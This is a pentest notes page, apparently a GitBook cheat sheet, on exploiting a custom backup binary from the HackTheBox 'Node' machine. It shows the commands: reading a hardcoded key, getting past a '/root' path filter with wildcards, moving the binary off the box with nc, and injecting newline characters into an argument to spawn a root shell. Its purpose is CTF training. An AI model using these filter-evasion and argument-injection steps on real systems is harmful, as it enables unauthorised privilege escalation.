Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • You found a custom Binary
  • "backup" example
  • backup /root
  • Avoid '/root' Filter with Splatting
  • Work Local
  • strace
  • Analyze Assembly: radare2
  • Analyze Assembly: binaryninja
  • PrivEsc: Newline Character
  • PrivEsc: Newline Character printf

Was this helpful?

  1. 06 Linux PrivEsc

binaries

Previous5 LootingNextBuffer Overflow

Last updated 2 years ago

Was this helpful?

You found a custom Binary

  • What does it do?

  • Perhaps a script or job is running it.

  • How many options does it take?

  • How you can exploit it?

  • REF: , ,

"backup" example

  • From nodeHTB,

  • Custom app: /usr/local/bin/backup

  • Find a script that executes 'backup' and learn from it!

grep -Ri backup .               ..find references to 'backup'
find . | grep app.js            ..find our app
cat /var/www/myplace/app.js

const backup_key  = '45fac123...';
app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';

backup -q key /dir   ..we learned how to execute!

backup /root

----------------
backup -q key /dir                                    ..how to execute!
/usr/local/bin/backup -q 45fac123... /tmp > out.txt   ..works!
base64 -d out.txt > decode-base64                     ..decode
file decode-base64                                    ..zip archive
unzip decode-base64                                   ..unzip

----------------
get root:
/usr/local/bin/backup -q 45fac123... /root > root.txt
base64 -d root.txt > /tmp/root
unzip root         ..failed
7z x rootdecoded   ..kinda worked?
cat root           ..failed

Avoid '/root' Filter with Splatting

----------------
Root Blocked
echo 'hello' > /tmp/root    ..decode/unzip/cat  ..fail
echo 'hello' > /tmp/*r00t   ..decode/unzip/cat  ..success

----------------
Splatting:
.backup -q secretkey /r**t/r**t.txt > root.txt
base64 -d root.txt > /tmp/secret
unzip secret
cat root/root.txt  ..success

----------------
myapp -q secretkey /r**t/r**t.txt > /tmp/encoded
myapp -q secretkey /r??t/roo?.txt > /tmp/encoded
myapp -q secretkey /r*t/r*t.txt > /tmp/encoded

Work Local

  • Send file to yourself.. You have better analysis tools!

nc $MyIP 4444 < /usr/bin/backup   ..send
nc -nlvp 4444 > backup            ..receive

md5sum backup                     ..confirm
chmod +x ./backup

strace

strace ./backup                    ..might be interesting
strace ./backup 1 2 3              ..works better with 3 arguments :)

ltrace ..found our app was filtering root and etc
ltrace /usr/local/bin/backup -q secretkey /root/root.txt

Analyze Assembly: radare2

> r2 backup  
aaa       ..analyze
afl       ..function list
vvv       ..visual mode
sym.main  ..scroll here
g g       ..get details
<space>   ..change view: nice call graph

./backup 1 2 3           ..App needs 3 Arguments!
strace ./backup 1 2 3    ..reads from /etc/myplace/keys

Analyze Assembly: binaryninja

  • Better graphics than radare2

  • But, doesnt show hex nicely

/opt/binaryninja/binaryninja

'main'  ..drill around follow the blacklist and trollface
'push'  ..keywords to watch for

Found redirects: /root $ ` ; | /etc // /

PrivEsc: Newline Character

/bin/myapp -q secretkey "xxx
> /bin/bash
> xxx"
# whoami ..root!

PrivEsc: Newline Character printf

  • Newline character in printf function can also give you root!

------------------
printf 'hi\nNewLine\nBye'  ..gives us new lines

------------------
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/bash\nxxx')"
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/sh\nxxx')"

REF:

BufferOverflow
CharEvasion
PrivEsc
mongodb
CharEvasion
https://joshuasuren.medium.com/hack-the-box-node-write-up-11-b47efb3c98ab